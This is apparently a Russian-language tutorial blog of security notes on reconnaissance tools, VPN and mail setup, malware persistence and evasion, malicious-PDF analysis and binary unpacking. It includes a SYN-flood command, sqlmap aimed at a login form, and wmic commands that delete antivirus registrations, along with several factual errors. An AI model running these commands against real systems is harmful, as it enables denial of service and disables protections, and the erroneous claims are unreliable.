Кейс про работу с ИП: к вам в работу поступил публичный веб-сайт, надо его проанализировать. Можно посмотреть на DNS. Выяснить DNS легко командой dig +short mx example.site, ответ может выглядеть как 50 fb.mail.test.net. 50 в начале это приоритет, если бы был сервер с 10.fb.mail.test.net, то он был бы важнее. Далее, инструментом swaks --to target@example.com --from test@domain.com --server fb.mail.test.net --port 25 «пробуем» почту. Ответ будет типа в формате Service unavailable; Client host [x.x.x.x] blocked using pbl.spamhaus.org; Listed by PBL. Это означает, что IPшник находится в черном списке. Узнайте свой IP-адрес, на маке это делается командой ipconfig getifaddr en0. И прогоните по сервисам ниже в списке. Так вы узнаете, находится ли ваш IP в черном списке и если да, то это проблема для организации.

• virustotal.com
• ipvoid.com
• talosintelligence.com
• otx.alienvault.com
• projecthoneypot.org
• spamhaus.org
• ipqualityscore.com
• shodan.io
• greynoise.io
• fraudguard.io
• threatminer.org

Цепочки по соц. сетям можно строить инструментом SpiderFoot, его запускаете командой spiderfoot -l 127.0.0.1:5001, и далее вам откроется веб-интерфейс для сканирования. Это такой швейцарский нож. Вместе с CyberChef, это достаточно мощная связка для анализа.

Альтернатива это ZAProxy, сканер веб-приложений. Делаете скан, и далее Report > Generate report, и можно начинать исправления.

Либо SkipFish для быстрого сканирования. Whatweb также хорош, команда whatweb --user-agent "Mozilla/5.0" --max-threads 1 https://www.camn.ids/, и как результат мы увидим что-то вроде:

Дальнейшие шаги

Первые команды после получения доступа к серверу нужны для проверки роли/диска командами типа whoami или lsblk для информации о дисках, разделах, размерах и точке монтирования. Дополнительно, команды df -h для просмотра занятого дискового пространства,
fdisk -l для детальной информации по каждому диску/разделу. lsof -u kali для понимания, какой софт запущен от имени пользователя kali. Более детально можно посмотреть через кастомный вывод: ps -ao tty,comm,pid. И ps -ef для просмотра процессов в статике и top в динамике. Это все команды Linux, без них никуда. В сети всегда есть Linux. Вот вы со своей Windows сидите в интернете, а роутер, который является и маршрутизатором, работает на Linux. Linux везде, почти все веб-сервера, маршрутизаторы, CI/CD процессы в Linux, виртуализация тоже на Linux. Потому что Linux бесплатен.

Базовые команды для получения информации о машине это dmesg | less (или more) и dmesg | head -n2. Так вы узнаете версию ядра Linux и детали по загрузчику. Про память нам расскажет команда dmesg | grep 'Memory'. Memory можно менять на eth, DIGSIG, ttyS5, CPU, digsig, amdgpu и многое другое под ваши хотелки.

По файловой системе Linux (FHS), точка входа в файловую систему это /. Команда
ls -lah / выводит список файлов в каталоге в удобном и информативном формате. Регулярно заходим в мониторинг процессов Linux. Аналог диспетчера задач, открывается командой top. Особое внимание на systemd, он задает отношения между компонентами системы, назначает процессам всякие возможности и злоумышленники его ой как любят. И libcap.

Очень примитивный инструмент для ARP (Address Resolution Protocol) в сети netdiscover, позволяет найти активных хостов в локальной сети. При запуске, может быть сообщение, что сканирование завершено, но на самом деле оно в процессе. Могут быть найдены веб-сервера с портом 80 (HTTP) или 443 (HTTPS), или просто получим IP-адреса целей. Их можно просканировать на открытые порты через nmap. Нашли открытые порты — закрываем. Или делаем там ловушки по инструкции выше. Для сканирования больших подсетей, на которые уйдут месяцы, используем Masscan и RustScan. Искать 2000 порт, который обычно открыт. И тогда masscan -p 2000 —banners хорошо помогает.

А теперь отправим что-нибудь в мир. hping3 позволит вам нагенерировать много пакетов. Им можно тестировать сервер на защиту от DDoS. Базовая команда sudo hping3 -1 google.com, либо уже опасная команда sudo hping3 --flood -S -p 80 sitefor.test для тестирования на DDoS. Хотите узнать наличие фаервола? Команда sudo hping3 -A -p 80 8.8.8.8, выдаст вам тако поток digital-сознания:

len=46 ip=8.8.8.8 ttl=255 id=8333 sport=80 flags=R seq=0 win=0 rtt=7.6 ms
len=46 ip=8.8.8.8 ttl=255 id=8334 sport=80 flags=R seq=1 win=0 rtt=7.1 ms
len=46 ip=8.8.8.8 ttl=255 id=8335 sport=80 flags=R seq=2 win=0 rtt=7.0 ms

Тут важно flags=R, что говорит о том, что порт фильтруется.

Для тестов форм, недобросовестные умы используют sqlmap -u "http://example.com/wp-login.php" --forms --batch, позволит проверить формы на SQl-инъекции. Либо он ничего не найдет, либо предложит несколько точек для инъекции.

А теперь прокси. Mitmproxy, в котором есть режим работы через WG (wireguard). Вы поднимаете vpn-тунель, куда лезет весь трафик от всех приложений, и mitmproxy его слушает. Прокси как раз служит прослойкой между вами и запрашиваемым ресурсом, пряча IP-адрес. И не надо думать, что с помощью VPN вы дурачите провайдеров. У всех VPN есть определённый протокол, который можно выявить. Трафик идёт в пакетах, состав которых можно анализировать технологией DPI (Deep Package Inspection). Проверяется, какая информация в пакете, если состав пакета похож на пакет протокола OpenVPN или Wireguard, то дальнейшую его передачу можно заблокировать. Просто VPN это не инструмент для посещения запрещенных ресурсов, а для создания туннелей для удаленных офисов, корпоративных сетей. Например, протокол GRE для создания туннелей точка-точка. Если у вас есть два офиса, 192.168.1.0 и 192.168.10.0, и надо их объединить в одну сеть, то популярное решение будет GRE. За деньги, вы можете реализовать такую идею как L3 VPN от провайдера, либо бесплатно на GRE. GRE попросту добавляет в пакет новый заголовок. Также, GRE решает проблему с отсутствием шифрования на мультикастный трафик.

Собрать статистику по использованию ресурсов можно командой mpstat -P ALL 1, а если надо унести с собой копию диска внутреннего злоумышленника для анализа, то guymager прекрасно справится.

И собрав всю информацию, приступаем к написанию Yara-правил. Для начала проверьте версию yara --version, создайте новое правило nano my_first_rule.yar и вставьте туда любое из правил, которые щедро публикуют вендоры. Например, тут, еще. Не все правила идеальны, слишком общие правила генерируют множество ложных срабатываний. После того, как правило скопировано в гитхаба, вы можете натравить его на файлик командой yara my_first_rule.yar '/home/kali/fakebat_test.ps1'. Если правило сработало, то вы получите следующий ответ:

Также, правила можно найти в отчетах, например, еще пример. Правила можно писать самостоятельно, есть документация. Помимо YARA-правил, существуют правила Sigma, Suricata. А далее автоматизация процесса с тысячами таких правил через velociraptor. Так мы организовываем защиту.

Binwalk позволяет достать из файла много информации, такой как узнать архитектуру, под какой контроллер написана прошивка, или узнать энтропию с помощью binwalk -E. В простом исполнении команда будет выглядеть так: binwalk '/home/kali/Punktracker-ModRep-2.5.6-XM.bin', но полноценный анализ требует вычитки документации.

Про мобайл. MASVS от OWASP про то, что тестировать, MASTG это одна из основных доков по анализу мобилок, описывает как тестировать. И банально проверка кода СМС должна проходить не на клиенте, контролируйте ваших разработчиков. Всегда можно обогатить отчет информацией из npm audit, хотя он выдает много false positive. Если у вас веб-разработка, то в папке node_modules всегда много уязвимостей. Команда npm audit fix --force помогает, но порой ломает костыли разработчиков и поэтому они не хотят фиксить уязвимости. Но еще лучше — dependabot. Детали по уязвимостям можно также подсмотреть на ossindex.sonatype.

Более современно это auditjs, и сверху Nexus как прослойка между NPM и проектом.

Настройка туннелирования

Есть много способов настроить корпоративный VPN и дать удобное юзабилити сотрудникам для их мобильного устройства, Wireguard один из них. Wireguard позволит настроить шифрованные туннели. Предположим, у вас уже арендован/настроен свой сервер у того же Касперского. Открываем консоль, в ней достаточно прописать команду ssh root@xxx.10.11.xxx , у вас должен быть либо пароль, либо приватный ключ для авторизации. Смотрим описания выше про VPS. Далее переходим к настройке.

Убеждаемся, что у вас установлен wireguard командой wg --version. Для wireguard, порт по умолчанию будет UDP 51820, потому что мы не хотим нарушать никакие законы и все делаем в рамках законодательства РФ.

Понадобятся публичный и приватный ключи для сервера и для устройств, т.к. используется симметричное шифрование. И также нужно создать файл конфигурации под именем wg0.conf. По шагам:

1. Перемещаемся в нужную папку командой cd /etc/wireguard
2. umask 077 для увеличения безопасности
3. wg genkey | tee /etc/wireguard/privatekey | wg pubkey | tee /etc/wireguard/publickey для генерации ключей, после выполнения команды появятся файлы privatekey и publickey.
4. Ручками сохраняем значение после команды cat /etc/wireguard/privatekey для вставки в wg0.conf.

Далее создаем и заполняем файлик wg0.conf. nano /etc/wireguard/wg0.conf. Файл создан, в свежесозданный wg0.conf вставляем следующий шаблон:

[Interface]
PrivateKey = <contents_of_privatekey>
Address = 10.8.0.1/24  # VPN subnet
ListenPort = 51820
PostUp = iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
PostDown = iptables -D FORWARD -i wg0 -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE

• wg-quick up wg0 для запуска интерфейса
• systemctl enable wg-quick@wg0 для запуска сервиса
• systemctl status wg-quick@wg0 для проверки
• понадобится делать перезапуск регулярно, поэтому вот две команды wg-quick down wg0 и systemctl start wg-quick@wg0 должны вбиваться в терминал на регулярной основе

Настройки для конечных устройств:

1. генерируем новые ключи для определенного устройства на Android wg genkey | tee /etc/wireguard/android_privatekey | wg pubkey | tee /etc/wireguard/android_publickey
2. возвращаемся к файлу конфигурации wg0.conf командой nano /etc/wireguard/wg0.conf, и добавляем
   

[Peer]
PublicKey = <ANDROID-СLIENT-PUBLIC-KEY>
AllowedIPs = 10.0.0.3/32

Создаем второй файлик командой nano /etc/wireguard/ios.conf, заполняем:

[Interface]
PrivateKey = <ANDROID_PRIVATE_KEY>
Address = 10.0.0.3/32
DNS = 8.8.8.8

[Peer]
PublicKey = <SERVER-PUBLICKEY>
Endpoint = <SERVER-IP>:51820
AllowedIPs = 0.0.0.0/0
PersistentKeepalive = 20

И создаем QR-код qrencode -t ansiutf8 < /etc/wireguard/ios.conf. Сканируем с телефона и готово, корпоративная сеть для вашей компании на минималках создана, по аналогии можно создать сеть на любом российском сервере.

Настройка почты

Иметь свой почтовый сервер всегда хочется. Настраивается не так сложно, как кажется. Вам достаточно арендовать VPS на Ubuntu, и локально на своей машине командой ssh-keygen сгенерировать ключ, закинуть публичный ключ на арендованный сервер. И для защиты поставим права доступа chmod 400 .ssh/folder, так только мы сможем читать ключ, а менять нам его особо и не нужно. Далее берем http://poste.io/ или его альтернативы, например mailu.io. Как инженеры, мы либо следует инструкциям, либо пишем их. Нам нужен Docker для poste, находим инструкцию и копируем команды к себе на сервер. Аналогичное проделываем для poste из официальной инструкции.

Теперь нам нужно найти открытый порт, это делается командой netstat -tulpn | grep LISTEN на нашем VPS. Берете IP-адрес вашего VPS, идете по инструкции настройки poste.io. Следующим шагом приобретаем доменное имя, которое не содержится в черных списках. Если вам приходит спамерское письмо от gmail, значит была сделана подмена имени отправителя, а для борьбы с этим не забываем настроить SPF, DKIM, DMARC.

Отправка писем работает на протоколе SMTP, для SMTP нужны порты 25 (входящие), 587 (зашифированный обмен) и 465 (устарел). Это текстовый протокол, идет подключение к серверу-отправителю > передача текста > соединение закрыто. Отправка это не получение, для получения писем используются протоколы POP3/IMAP.

Отчет

Если есть время использовать SysReptor, то хорошо. У них даже есть примеры отчетов. Иначе и Word пойдет.

Очень наглядно для CTO это нарисовать упрощенную схему сети. Для этого можно программно связать CMDB с Vsio, Netbox или другим инструментом. И число активов должно соответствовать с числом активов от сканеров, SIEM, NTA.

Malware бывают разных типов, это не обязательно сложный софт. Обычная malware представляет собой очень простую программу в 10 строк. Может начинаться с некого #!/bin/bash, так система поймет, что выполнение должно произойти в Bash. Но не обязательно, например такой код не несет в себе ничего плохого, это попросту отправка письма из bash-скрипта:

bash
#!/bin/bash

recipient="recipient@example.com"
subject="Тема письма"
body="Текст письма"

echo "$body" | mail -s "$subject" "$recipient"

А если добавить бесконечный луп, то это уже спам и DDoS. Вредонос может и не прятаться в системе, а попросту сломать легитимную программу. Более продвинутые могут быть настолько хитры, что добавляются в код программ, и даже не меняют размер зараженного файла.

Как запускаются Malware, и как они выживают в системе с антивирусом? Иногда они прописываются в реестре винды. Реестр это как центральная нервная система, и Malware прописывают туда свои ключи, что позволяет им активироваться на каждую новую загрузку винды. Также есть startup folder, где малварка хранит шорткат на саму себя, и активируется на каждый логин пользователя. Также, Scheduled tasks отличный инструмент для запуска чего-либо на регулярной основе. В PowerShell вбейте Get-ScheduledTask или запустите taskschd.msc и узнаете, какие задачки у вас запланированы на винде. Откроете для себя много интересного. И убедитесь, что у вас не включен WinRM командой Get-Service WinRM.

Из более продвинутого, в реестре, можно прописаться в автостарт на Winlogon. Для проверки, существует программа Autoruns от Sysinternals, которая покажет все автозапускаемые программы на компьютере, включая планировщик и реестр. И всегда не лишним будет просканировать ПК через MalwareBytes, ибо никто не отменял инъекцию в легитимный софт. И банальный KVRT не повредит, даже если вы скептически относитесь к продукции Касперского. Дополнительно, RootkitRevealer от MS и Hfind для поиска скрытых файлов на диске.

Для распространения вируса требуется переносчик (infection vector), обычно это физические носители, такие как электронная почта, мгновенный обмен сообщениями и чат, социальные сети, URL-ссылки, файловые ресурсы, уязвимости программного обеспечения.

Некоторые малварки могут прятаться, если знают, что система под защитой. Часто они полагаются на ptrace. Вредоносное ПО обычно использует системный вызов ptrace() для обнаружения отладки. Проверяют, возвращает ли ptrace() ошибку при попытке отследить себя. Если ptrace() возвращает ошибку при попытке процесса отследить себя, это указывает на то, что процесс уже отслеживается, возможно, отладчиком. Такой список защиты вирусов от обнаружения обходят с помощью nested debugging, когда есть несколько дебаггеров, которые прикрывают друг друга.

Переопределение функции ptrace() может быть особенно полезным в сценарии, когда аналитик безопасности имеет дело с вредоносным ПО, использующим ptrace() для защиты от отладки. Многие виды вредоносных программ проверяют, ведется ли их отладка, выполняя вызов ptrace() с флагом PTRACE_TRACEME. Если этот вызов не проходит, вредоносная программа понимает, что ее отлаживают, и может изменить свое поведение, завершить работу или предпринять другие уклоняющиеся действия. Переопределив ptrace() так, чтобы она всегда возвращала 0, аналитик безопасности может эффективно нейтрализовать эту антиотладочную проверку. В результате, когда вредоносная программа выполняет вызов ptrace(), она получает ответ, указывающий на то, что отладка не ведется, хотя она ведется. Это позволяет аналитику продолжать наблюдать за поведением вредоносной программы, не запуская ее защитные механизмы, что дает более четкое представление о ее функциональности и потенциальных угрозах.

Или reverse touring-test, когда мы пытаемся убедить malware, что компьютер взаимодействует с человеком. Это могут быть эмулированные клики, или движения мыши. Также, malware может проверять процессы в системе, которые связаны с виртуальным окружением, такие как vmtoolsd.exe. Или даже драйверы с железом. Очень любят использовать FindWindow(), CreateToolhelp32Snapshot() и FindProcess(). Некоторые malware отслеживают с помощью rdtsc + Sleep(), чтобы в системе не было ускорено время.

Другой тип опасного ПО это руткиты. Руткит представляет собой серьезную угрозу компьютерной безопасности благодаря своей способности получать глубокий доступ к системе, часто с правами администратора, и без обнаружения. Руткиты позволяют скрывать очень серьезные атаки. После установки он может манипулировать основными функциями системы, скрывать другие вредоносные программы, создавать бэкдоры и обходить стандартные методы обнаружения, что делает его крайне сложным для обнаружения и удаления. Руткиты могут привести к полному захвату системы, краже данных и длительному незамеченному присутствию злоумышленников в сети компании. Руткиты могут засесть даже в ядро OS. Руткиты любят притворяться драйверами, поэтому их очень сложно обнаружить. Также, могут использовать интернет-соединения будучи незаметными для большинства инструментов ИБ.

Для защиты от руткитов одним из эффективных методов является использование инструментов обнаружения на основе поведения. Эти инструменты отслеживают поведение системы на предмет аномалий, которые могут указывать на наличие руткита, например, неожиданные изменения в системных файлах или несанкционированный доступ к конфиденциальным областям операционной системы. Регулярное обновление операционной системы и защитного программного обеспечения также может помочь, поскольку обновления часто включают исправления для известных уязвимостей, которые эксплуатируют руткиты.

Макро-вирусы живут в макросах Excel и Word, вредоносный скрипт запускается в момент открытия документа. Очень часто они просят разрешение на запуск макроса при открытии документа, поэтому внимательно читайте сообщения.

Существуют даже полиморфные вирусы, которые меняют свой код на лету и их труднее детектировать. В коде вируса существуют независимые блоки кода, которые могут меняться сами или менять свою позицию в коде.

И вирусы гипервизоров, которые компромитируют все виртуальное окружение между железкой и ОС. Это по факту часть системы, их невозможно обнаружить.

Также, можно проверить наличие антивируса Касперского Power Shell командой wmic /namespace:\root\SecurityCenter2 path AntiVirusProduct get /format:list. И даже запросить его удаление командами:

wmic /namespace:\root\SecurityCenter2 path AntiVirusProduct delete
wmic /namespace:\root\SecurityCenter2 path AntiSpywareProduct delete

Офисные файлы

Для затравки, рассмотрим формат PDF и как злоумышленник может его использовать в своих целях. PDF-файл состоит из 4-х блоков: header, body, cross-reference table, trailer.

В Header можно найти строку %PDF-1.1, которая отвечает за версию. Все, что ниже версии 1,4 — небезопасно. Каждый объект в файле pdf содержит object number and a generation number. В trailer можно найти кол-во объектов в документе, и также метаданные с именем автора, датой создания, т.п.. И внутрь PDF можно вложить практически все, что угодно. Например, base64, в котором слово design будет представлено в виде ZGVzaWdu. Буква a представлена цифрой 97, которая в свою очередь 8-битный бинарный код 01100001. pdf можно зашифровать алгоритмами RC4 и AES. Я все это описал с целью показать, что внутрь pdf можно запихнуть совершенно разный контент и этот контент может быть представлен по разному. Можно даже использоваться eval() из JS.

Процесс чтения PDF-файла. Чтобы прочитать PDF-файл и преобразовать его из плоской серии байтов в граф объектов в памяти, обычно выполняются следующие действия:

• Считывание заголовка PDF из начала файла, проверка того, что это действительно PDF-документ, и получение номера его версии.
• Теперь можно найти маркер конца файла, выполнив поиск в обратном направлении от конца файла. Далее, чтение словаря трейлеров и получение байтового смещения начала таблицы перекрестных ссылок.
• Теперь можно прочитать таблицу перекрестных ссылок. И вот мы знаем, где находится каждый объект в файле.
• На этом этапе можно прочитать и разобрать все объекты, а можно оставить этот процесс до тех пор, пока каждый объект не понадобится, читая его по требованию.
• Теперь мы можем использовать данные, извлекать страницы, разбирать графическое содержимое, извлекать метаданные и так далее.

Мы рассмотрим вредоносное ПО, замаскированное в PDF-документе. Начнем с изучения заголовка PDF-файла, для этого воспользуемся несколькими очень полезными скриптами, предустановленными в REMnux: pdfid, pdf-parser и peepdf. В REMnux, вбейте команду pdfid.py collab.pdf. Где collab.pdf это имя вредоносного (или любого другого) файла.

На скриншоте выше видно, что в файле collab.pdf обнаружено три экземпляра /JavaScript. Присутствие JavaScript в PDF-файле является существенным признаком того, что документ может быть вредоносным. Кроме того, появление /OpenAction указывает на то, что документ предписывает приложению PDF выполнить определенное действие при открытии файла. Эта функциональность потенциально может быть использована для инициирования выполнения вредоносного кода.

Пойдем далее, и командой pdf-parser.py collab.pdf --search JavaScript | more просканируем файл collab.pdf на наличие объектов, содержащих термин ‘JavaScript’. Среди объектов с содержанием строки ‘JavaScript’, есть объект 1 0. Этот объект, по-видимому, является вызовом функции JavaScript с именем WRYXKTNGCHZUIHQNDKDRYSREUUBHDTLWVGNINGPL. Вероятно, эта функция определена в другом месте PDF-файла. Стоит отметить, что JavaScript в PDF-файлах может быть распределен по нескольким объектам.

Для более глубокого анализа, вобьем команду pdf-parser.py collab.pdf --object 10 и получим… ничего интересного.

А вот после проверки object 13 pdf-parser.py collab.pdf --object 13, мы видим, что файл «Contains Stream», а это значит, что его содержимое закодировано в потоке и должно быть декодировано. Давайте декодируем поток с помощью pdf-parser.py и сохраним декодированные данные в файл streamdecode.txt с помощью следующей команды:

pdf-parser.py collab.pdf --object 13 -f -w -d streamdecode.txt

Командой js -f /usr/share/remnux/objects.js -f streamdecode.txt мы получим ответ, что надо обратить внимание на некую функцию, скажем это HjuHgfd.

Далее мы перемещаемся в инструмент scite. SciTE это текстовой редактор, которым можно открыть PDF и проверить структуру. В SciTE мы сможем посмотреть, что из себя представляет HjuHgfd. Она вполне может быть псевдо-функцией для eval();

Далее нам нужно перенести этот файл на виртуальную машину Windows, чтобы проверить его виндовыми инструментами. Для этого нам нужно включить демон SSH на REMnux и записать IP-адрес с помощью следующих двух команд: sshd start и сразу следом myip. Получаем IP адрес,который нужно указать на виндовой машине в программе WinSCP в качестве host name.

Так мы настроили связь между windows и remnux, и теперь можем поперетягивать файлики между операцонками, чтобы анализировать файл на виндовс-машине с помощью scdbg, и найти Shellcode. Вкратце, таков процесс ручного анализа.

Откуда берутся уязвимости

Говоря о безопасности программного обеспечения, мы говорим не только об IT (Internet technology), которые про Интернет. Речь об OT (Operational technology), которые напрямую затрагивают физический мир. Это вода, электричнство, производство, нефть, газ. В атаках могут участвовать как довольно банальные вирусы-вымогатели (ransomware), так и геополитические силы. В OT медленнее происходят обновления, все работает по принципу «не трогай и не сломается». Отсюда высокие риски в соответствии со спецификой индустрии, так, в здравоохранении пытаются украсть личные даные пациентов, в ретейле популярен payment fraud и уменьшение доверия клиентов, индустриалка это прерывание производства, атаки на государство это атаки на критическую инфрастуртуру, с использованием CAAS (преступление как сервис).

По аналогии, существует разница между киберзависимыми и кибервнедряемыми преступлениями. Первое зависит от ИКТ, а второе использует ИКТ для увеличения масштабов и воздействия. Киберзависимые преступления требуют использования ИКТ либо в качестве средства, инструмента, либо в качестве объекта преступных действий.

Как защититься? Организации могут снизить уровень инсайдерских угроз, внедрив строгий контроль доступа, проводя регулярные тренинги по безопасности для сотрудников, отслеживая сетевую активность на предмет необычного поведения и формируя культуру осознания безопасности. Регулярные аудиты и применение политики наименьших привилегий, когда сотрудники имеют только тот доступ, который необходим для выполнения их функций, также могут помочь снизить эти риски.

Если ваша компания разрабатывает свой софт, то рекомендуется интеграция методов разработки SDLC и SecDevOps для обеспечения безопасности. SDLC помогает выявить и устранить уязвимости безопасности на ранних этапах процесса разработки. Такой упреждающий подход более эффективен и экономически выгоден, чем решение проблем безопасности после развертывания ПО. Он гарантирует, что безопасность является основополагающим аспектом программного обеспечения, а не «послесловием», что приводит к созданию более надежных и безопасных приложений. А если S-SDLC, то вообще хорошо. S-SDLC не только про предотвращение появления уязвимостей, но и увеличение доверия пользователей и партнеров. На этапе требований описываются требования к безопасности > идет планирование > разработка и тестирование с учетом требований к безопасности > деплоим в продакшн > убираем все устаревшее. Требования учитывают вводные специалистов по ИБ, какие данные надо защитить и какие потенциальные угрозы надо учесть, как изменить архитектуру на наиболее устойчивую. Требования регуляторов в том числе, особенно приватность. Написание кода также про устойчивость к атакам, корректной работе с сессиями, и использование статического и динамического анализа кода. И проверка кода коллегами. Во время деплоймента проводятся последние проверки на ИБ, правильно ли сконфигурированы сервисы, все ли данные защищены.

Также, регулярный анализ исторического пласта проблем в вашем стеке технологий очень рекомендуем. Например, точно нужна проверка, что все пути заключены в кавычки, попросту всегда и без исключений. Нету ковычек = шанс повышения привилегий из-за особенностей алгоритмов Windows для поиска пути. Если вы ссылаетесь на какой-то DLL файлик, то Windows может искать его в разных местах системы. Также, проверка списка доступов на продуктовой настройке реестра. Есть излюбленные злоумышленниками адреса в реестре, например HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Device In.

Другая возможная проблема это last-byte sync, т.е. возможность засунуть два запроса в один TCP-пакет на хорошей скорости интернета.

И еще одна часто встречающаяся проблема это Race condition. Например, множественное переиспользование капчи, или многократное применение купонов на скидку. Другими словами, Race condition про выполнение действия большее кол-во раз, чем задумывали разработчики. Два запроса в один момент времени, например, логин и получение доступа к панели алминистратора, могут служить причиной утечки данных. Для борьбы с этим существует Delay Jitter/ Network Jitter.

Есть статистика, что 64% уязвимостей из-за ошибок программистов. Эти ошибки ведут к созданию CVE (потенциаоьные уязвимости), то есть классификация недочетов в коде, которые приводят к уязвимостям. Статическое тестирование безопасности приложений помогает найти уязвимости на этапе программирования. Например PVS‑Studio от авторов из Тулы.

Когда команда разработки находит уязвимость в своем софте, то первый вопрос менеджера: «воздействует ли уязвимость на продукт»? Сама по себе уязвимость это просто наличие поведения, которое приводит к плохим вещам. Чтобы такое поведение использовать в плохих целях, нужен эксплойт. Существуют базы эксплойтов: shodan, sploitus, в гугле.

Бинарники

Когда вы компилируете код, то вы можете «добавить» все нужные библиотеки непосредственно в файл вашей программы, или ссылаться на них. Последний вариант называется динамическая компиляция, и у него есть свои преимущества:

• Экономия памяти: Когда несколько программ используют одну и ту же библиотеку, динамическая компоновка позволяет им совместно использовать одну копию библиотеки в памяти, что уменьшает общий объем памяти.
• Экономия дискового пространства: Поскольку код библиотеки не включается в каждый исполняемый файл, это экономит дисковое пространство на хост-системе. Согласитесь, пользователь не захочет скачивать калькулятор, который весит 200мб.
• Простота обновления: Библиотеки можно обновлять независимо от исполняемого файла. Это означает, что исправления и улучшения безопасности можно быстро распространять без необходимости перекомпилировать зависимые программы.
• Модульность: Позволяет использовать более модульный подход к разработке приложений, когда различные части программы могут разрабатываться и обновляться независимо друг от друга.

Потенциальные недостатки динамической компоновки:

• Накладные расходы времени выполнения: Динамически компилируемые программы могут иметь снижение производительности при запуске, поскольку компиляция происходит во время выполнения.
• Управление зависимостями: Отслеживание правильных версий динамических библиотек может быть сложным, особенно если для разных программ требуются разные версии.
• Потенциал поломки: если общая библиотека обновляется несовместимо, это может привести к поломке всех программ, которые от нее зависят, что называется «адом зависимостей».
• В целом, динамическое связывание дает преимущества с точки зрения эффективности и удобства обслуживания, но требует тщательного управления версиями библиотек и может внести дополнительные сложности в развертывание приложений.

Как бы там ни было, после компиляции появляется бинарник, который преобразовывает код C++ (или другой язык) в машинный код для процессора, то есть в нули и единицы. Такие бинарники могут запускаться и выдавать результат для пользователей, в том числе это игры. Классический процесс компиляции состоит из 4 этапов: preprocessing, compilation, assembly, linking.

На этапе 1) препроцессинга можно решить, будет ли у вас много маленьких файликов или один большой. Это стадия подготовки, код готовится к компиляции. Например, удаляются комментарии, macro expansion, добавляется контент, и выдает один .i файл.

На фазе 2) компиляции мы получаем код на языке ассемблер под конкретную архитектуру (а не машинный код), то есть, такой код человек также может прочитать. Ассемблер подходит и компьютеру, и человек. Этап компиляции включает в себя всякие оптимизации, проверку синтаксиса и семантику, и на выходе выдает файл в формате .asm. Это подготовленный код, включающий в себя заголовочные файлы и макросы.

На этапе 3) assembly (компоновка) вы уже получаете машинный код, где может быть, например, LSB (числа в памяти упорядочены в порядке что наименее значимый байт первый) и 64-bit ELF. Фаза компоновки — заключительный этап процесса компиляции, на котором компоновщик объединяет несколько объектных файлов (.o или .obj) и библиотек в один исполняемый файл. Основные задачи компоновщика включают:

• Компоновщик сопоставляет вызовы функций и ссылки на переменные с их определениями. Он ищет местоположение функций и переменных в предоставленных объектных файлах и библиотеках.
• Привязка адресов: Присваивает конечные адреса памяти функциям и переменным, корректируя секции кода и данных в объектных файлах так, чтобы они отражали правильные адреса.
• Связывание библиотек: Включает код из библиотечных файлов, которые используются программой. Это может быть статическая линковка, при которой библиотечный код копируется в конечный исполняемый файл, или динамическая линковка, при которой ссылки на библиотечный код устанавливаются для разрешения во время выполнения программы.

Проблемы, с которыми может столкнуться компоновщик, включают:

• Неопределенные ссылки: Если компоновщик не может найти определение символа, это приводит к ошибке «неопределенная ссылка».
• Множественные определения: Если один и тот же символ определен более чем в одном объектном файле или библиотеке, это может привести к ошибке ‘multiple definition’.
• Совместимость библиотек: Могут возникнуть проблемы с версией или совместимостью библиотек, когда программа требует версию, отличную от предоставленной.

4) Linking — берется множество файлов, которые комбинируются в единый файл. Если используется статичная библиотека, то она добавляется сразу в скомпилированный файл. Динамические библиотеки не добавляются, что позволяет сэкономить вес финальной программы. Безусловно, внешние зависимости могут меняться от версии к версии, и каждый раз в рантайме требуется подгружать библиотеки. Для анализа, чтобы найти локацию файла, подойдет libbfd (если вы согласны страдать с C), или куда лучше llvm. PE explorer также должен быть под рукой.

Все описанное выше подсказывает нам, что бинарные файлы не созданы для легкого реверс-инжиниринга. Такой файл более компактный, быстрый, так как не нужно переводить на лету в машинный язык, это сразу машинный язык. Для диссасмблинга смотрим в сторону IDA Pro, Radare2, Ghidra. Если используете IDA Pro, то имейте ввиду, что для анализа x64 понадобится продвинутая версия софта. Бесплатная версия не годится для серьезной работы. Зато при запуске анализа PE файла, файл занимает те же ячейки памяти, что и при потенциальном запуске в ОС. Если это невозможно, то будет произведен rebasing. Также, работу упростят дополнения Hex-Rays Decompiler или zynamics BinDiff.

Не забываем про супер-древний SoftICE, который позволял делать отладку любого процесса с правами из 0 кольца доступа ОС Windows. Альтернатива — WinDbg. WinDbg в настоящее время является единственным популярным инструментом, поддерживающим отладку ядра, также неплох для отладки в пользовательском режиме. OllyDbg — самый популярный отладчик для аналитиков вредоносных программ, но он не поддерживает отладку ядра. Если нужен встроенный отладчик, то OllyDbg будет удобнее и продвинутее, чем IDA Pro. OllyDbg и OllyICE это отладчики пользовательского режима. WinDbg для ядра, и Ether, BOCHS, HyperDBG работают с виртуализацией. MALT для работы с железом, самый глубокий уровень погружения.

Помимо OllyDbg, пригодится PEiD. А если вам нужно лишь подсчитать уровень угрозы, то в Mandiant Red Curtain это можно сделать. Распаковка существует трех типов: automated static unpacking, automated dynamic unpacking, и manual dynamic unpacking. Если у вас успешно сработал Automated Unpacking, то вам повезло и это лучший вариант развития событий. Чаще всего при распаковке вредоносных программ создается новый двоичный файл, который не идентичен оригиналу, но выполняет все те же действия, что и оригинал. Если не удается полностью распокавать программу, то работаем с тем, что удалось распаковать.

Также, имейте под рукой некоторые плагины (NSPack, UPack, и UPX), обычно они встроены в PE Explorer. UPX самый популярный, другой это PECompact, и чуть более продвинутый ASPack, после которого обычно приходится прибегать с ручной распаковке. И самый сложный — Themida, для зарубежных windows-машин. Для игровой индустрии — VmProtect.

Для понимания, чем была запакован потенциально вредоносная программа, используется Exeinfo PE. Исполняемые файлы на windows должны соответстовать PE/COFF. Исполняемые файлы типа .exe, .dll, .sys, .ocx, .drv считаются Portable Executable (PE). В этих файликах включен PE header с описанием структуры. Так, блок .rdata будет отвечать за read-only данные, а .rsrc для иконок, менюшек. Названия секций существуют только для людей и после обфускации имена могут быть изменены. Также представлена дата компиляции файла, но и она может быть изменена. Если будет видно, что дата в будущем, то это с высокой вероятностью тревожный знак. Запаковка это не архивирование, то есть запакованный файл должен запуститься на машине без предустановленного софта.

